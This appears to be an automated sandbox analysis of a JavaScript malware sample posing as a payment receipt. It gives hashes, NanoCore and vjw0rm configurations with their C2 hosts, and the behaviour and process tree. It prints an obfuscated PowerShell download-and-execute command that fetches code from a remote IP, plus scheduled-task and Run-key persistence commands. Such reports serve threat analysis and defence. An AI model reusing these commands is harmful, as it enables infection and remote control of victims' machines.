Analysis
- max time kernel: 161s
- max time network: 165s
- platform: windows10_x64
- resource: win10-en-20211014
- submitted: 28-10-2021 15:41

Static task: static1
Behavioral task: behavioral1
- Sample: h6d2_Payment_receipt.js
- Resource: win7-en-20210920
General
- Target: h6d2_Payment_receipt.js
- Size: 81KB
- MD5: ac46bea5b7fd09b1ab3da2b95cb03006
- SHA1: e59702bca30c23aed49b4e24e6f1411c450ba8d2
- SHA256: 2b3792055f5035ac6e37c372853654eb1d2ec05425f217b339816b0aa12605a2
- SHA512: 601600fd54e840843d04ea97f5e04389933cff2c49e0bca97207a27fe95937f282a8c3fc35f2e684aeb0f073f049dcd9f74ecf25fd56c9c35109d82d7ca433e4
Malware Config

Extracted
- http://13.78.209.105/E/err.txt

Extracted
- Family: nanocore
- Version: 1.2.2.0
- C2: kenimaf.duckdns.org:8090
- Mutex: 543e7469-d950-4ec2-a110-de54f8d16167
- activate_away_mode: true
- backup_connection_host: kenimaf.duckdns.org
- backup_dns_server: 8.8.4.4
- buffer_size: 65535
- build_time: 2021-08-01T06:39:50.225932136Z
- bypass_user_account_control: true
- bypass_user_account_control_data
- clear_access_control: true
- clear_zone_identifier: false
- connect_delay: 4000
- connection_port: 8090
- default_group: kenn
- enable_debug_mode: true
- gc_threshold: 1.048576e+07
- keep_alive_timeout: 30000
- keyboard_logging: false
- lan_timeout: 2500
- max_packet_size: 1.048576e+07
- mutex: 543e7469-d950-4ec2-a110-de54f8d16167
- mutex_timeout: 5000
- prevent_system_sleep: false
- primary_connection_host: kenimaf.duckdns.org
- primary_dns_server: 8.8.8.8
- request_elevation: true
- restart_delay: 5000
- run_delay: 0
- run_on_startup: true
- set_critical_process: true
- timeout_interval: 5000
- use_custom_dns_server: false
- version: 1.2.2.0
- wan_timeout: 8000

Extracted
- Family: vjw0rm
- C2: http://6200js.duckdns.org:6200
Signatures

- Blocklisted process makes network request (3 IoCs)
  Processes: wscript.exe, powershell.exe
  flow | pid | process
  9 | 1956 | wscript.exe
  26 | 3164 | powershell.exe
  27 | 3164 | powershell.exe

- Drops startup file (2 IoCs)
  Processes: wscript.exe
  description | ioc | process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\h6d2_Payment_receipt.js | wscript.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\h6d2_Payment_receipt.js | wscript.exe

- Adds Run key to start application (2 TTPs, 2 IoCs)
  Processes: wscript.exe
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run | wscript.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\BB4HJP0E1C = "'C:\\Users\\Admin\\AppData\\Local\\Temp\\h6d2_Payment_receipt.js'" | wscript.exe

- Suspicious use of SetThreadContext (1 IoC)
  Processes: powershell.exe
  description | pid | process | target process
  PID 3164 set thread context of 2860 | 3164 | powershell.exe | aspnet_compiler.exe

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

- Modifies registry class (1 IoC)
  Processes: wscript.exe
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings | wscript.exe

- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes: powershell.exe, aspnet_compiler.exe
  pid | process
  3164 | powershell.exe
  3164 | powershell.exe
  3164 | powershell.exe
  2860 | aspnet_compiler.exe
  2860 | aspnet_compiler.exe
  2860 | aspnet_compiler.exe

- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  Processes: aspnet_compiler.exe
  pid | process
  2860 | aspnet_compiler.exe

- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes: powershell.exe, aspnet_compiler.exe
  description | pid | process
  Token: SeDebugPrivilege | 3164 | powershell.exe
  Token: SeDebugPrivilege | 2860 | aspnet_compiler.exe

- Suspicious use of WriteProcessMemory (14 IoCs)
  Processes: wscript.exe, WScript.exe, powershell.exe
  description | pid | process | target process
  PID 1956 wrote to memory of 920 | 1956 | wscript.exe | schtasks.exe
  PID 1956 wrote to memory of 920 | 1956 | wscript.exe | schtasks.exe
  PID 1956 wrote to memory of 1188 | 1956 | wscript.exe | WScript.exe
  PID 1956 wrote to memory of 1188 | 1956 | wscript.exe | WScript.exe
  PID 1188 wrote to memory of 3164 | 1188 | WScript.exe | powershell.exe
  PID 1188 wrote to memory of 3164 | 1188 | WScript.exe | powershell.exe
  PID 3164 wrote to memory of 2860 | 3164 | powershell.exe | aspnet_compiler.exe
  PID 3164 wrote to memory of 2860 | 3164 | powershell.exe | aspnet_compiler.exe
  PID 3164 wrote to memory of 2860 | 3164 | powershell.exe | aspnet_compiler.exe
  PID 3164 wrote to memory of 2860 | 3164 | powershell.exe | aspnet_compiler.exe
  PID 3164 wrote to memory of 2860 | 3164 | powershell.exe | aspnet_compiler.exe
  PID 3164 wrote to memory of 2860 | 3164 | powershell.exe | aspnet_compiler.exe
  PID 3164 wrote to memory of 2860 | 3164 | powershell.exe | aspnet_compiler.exe
  PID 3164 wrote to memory of 2860 | 3164 | powershell.exe | aspnet_compiler.exe
Processes

- C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\h6d2_Payment_receipt.js
  - Blocklisted process makes network request
  - Drops startup file
  - Adds Run key to start application
  - Modifies registry class
  - Suspicious use of WriteProcessMemory

  - C:\Windows\System32\schtasks.exe
    Command line: "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\Admin\AppData\Local\Temp\h6d2_Payment_receipt.js
    - Creates scheduled task(s)

  - C:\Windows\System32\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\OWZC107LZZ.vbs"
    - Suspicious use of WriteProcessMemory

    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $H ='http://13.78.209.105/E/err.txt';$H1 = '******************^^^^^^^^^^^^^^^^^^``````````````'.Replace('******************','n').Replace('^^^^^^^^^^^^^^^^^^','E').Replace('``````````````','t');$H2 ='DDDDDDDDEEEEEEEEEEE'.Replace('DDDDDDDD','.').Replace('EEEEEEEEEE','W');$H4 ='NNNNNNNNNNNNNNNNTTTTTTTTTTNT'.Replace('NNNNNNNNNNNNNNNNTTTTTTTTTT','IE');$H3 ='LLLLLLLLLL'.Replace('LLLLLLLLL','bC');$HH =$H1+$H2+$H3+$H4;$HHH ='DO---------------nG'.Replace('---------------','WnLoaDSTrI');$HHHH ='I`---------------Ec++++++++++++++H).$HHH($H)'.Replace('`---------------','EX(ne`W`-Obj`').Replace('++++++++++++++','`T $H');&('I'+'EX')($HHHH -Join '')|&('I'+'EX');
      - Blocklisted process makes network request
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: GetForegroundWindowSpam
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

- C:\Users\Admin\AppData\Local\Temp\OWZC107LZZ.vbs
  MD5: 2b137d3d2ea7ddba63e99586f44e0388
  SHA1: d4634061943a78624880537ffa65472fc6195474
  SHA256: 1af97b7b7febcf25481d8c653b141681be8a1cad29a563e9057c02c1c87b75c2
  SHA512: 6a7240273576e625066b114960fa4063acd9404727d02bcd3183248f5c820161ec15fafe01858d22ddcf39cd4d03f8e52988625aabd7b01565339b8927693115

- memory/920-115-0x0000000000000000-mapping.dmp
- memory/1188-116-0x0000000000000000-mapping.dmp
- memory/2860-177-0x0000000005BC0000-0x0000000005BC3000-memory.dmp (Filesize: 12KB)
- memory/2860-176-0x0000000005A90000-0x0000000005AA9000-memory.dmp (Filesize: 100KB)
- memory/2860-175-0x0000000005140000-0x0000000005145000-memory.dmp (Filesize: 20KB)
- memory/2860-174-0x0000000002840000-0x0000000002841000-memory.dmp (Filesize: 4KB)
- memory/2860-172-0x0000000004DF0000-0x0000000004DF1000-memory.dmp (Filesize: 4KB)
- memory/2860-171-0x0000000004EF0000-0x0000000004EF1000-memory.dmp (Filesize: 4KB)
- memory/2860-164-0x0000000000400000-0x0000000000438000-memory.dmp (Filesize: 224KB)
- memory/2860-170-0x0000000004E50000-0x0000000004E51000-memory.dmp (Filesize: 4KB)
- memory/2860-169-0x0000000005350000-0x0000000005351000-memory.dmp (Filesize: 4KB)
- memory/2860-167-0x0000000000810000-0x0000000000848000-memory.dmp (Filesize: 224KB)
- memory/2860-165-0x000000000041E792-mapping.dmp
- memory/3164-124-0x00000262C9FE0000-0x00000262C9FE1000-memory.dmp (Filesize: 4KB)
- memory/3164-166-0x00000262B0010000-0x00000262B0012000-memory.dmp (Filesize: 8KB)
- memory/3164-131-0x00000262CA0C3000-0x00000262CA0C5000-memory.dmp (Filesize: 8KB)
- memory/3164-132-0x00000262B0010000-0x00000262B0012000-memory.dmp (Filesize: 8KB)
- memory/3164-146-0x00000262CA0C6000-0x00000262CA0C8000-memory.dmp (Filesize: 8KB)
- memory/3164-147-0x00000262CA0C8000-0x00000262CA0C9000-memory.dmp (Filesize: 4KB)
- memory/3164-158-0x00000262B0010000-0x00000262B0012000-memory.dmp (Filesize: 8KB)
- memory/3164-159-0x00000262CA040000-0x00000262CA064000-memory.dmp (Filesize: 144KB)
- memory/3164-160-0x00000262B0010000-0x00000262B0012000-memory.dmp (Filesize: 8KB)
- memory/3164-129-0x00000262CC1A0000-0x00000262CC1A1000-memory.dmp (Filesize: 4KB)
- memory/3164-128-0x00000262B0010000-0x00000262B0012000-memory.dmp (Filesize: 8KB)
- memory/3164-130-0x00000262CA0C0000-0x00000262CA0C2000-memory.dmp (Filesize: 8KB)
- memory/3164-127-0x00000262B0010000-0x00000262B0012000-memory.dmp (Filesize: 8KB)
- memory/3164-126-0x00000262B0010000-0x00000262B0012000-memory.dmp (Filesize: 8KB)
- memory/3164-125-0x00000262B0010000-0x00000262B0012000-memory.dmp (Filesize: 8KB)
- memory/3164-123-0x00000262B0010000-0x00000262B0012000-memory.dmp (Filesize: 8KB)
- memory/3164-122-0x00000262B0010000-0x00000262B0012000-memory.dmp (Filesize: 8KB)
- memory/3164-173-0x00000262CA070000-0x00000262CA071000-memory.dmp (Filesize: 4KB)
- memory/3164-121-0x00000262B0010000-0x00000262B0012000-memory.dmp (Filesize: 8KB)
- memory/3164-120-0x00000262B0010000-0x00000262B0012000-memory.dmp (Filesize: 8KB)
- memory/3164-119-0x00000262B0010000-0x00000262B0012000-memory.dmp (Filesize: 8KB)
- memory/3164-118-0x0000000000000000-mapping.dmp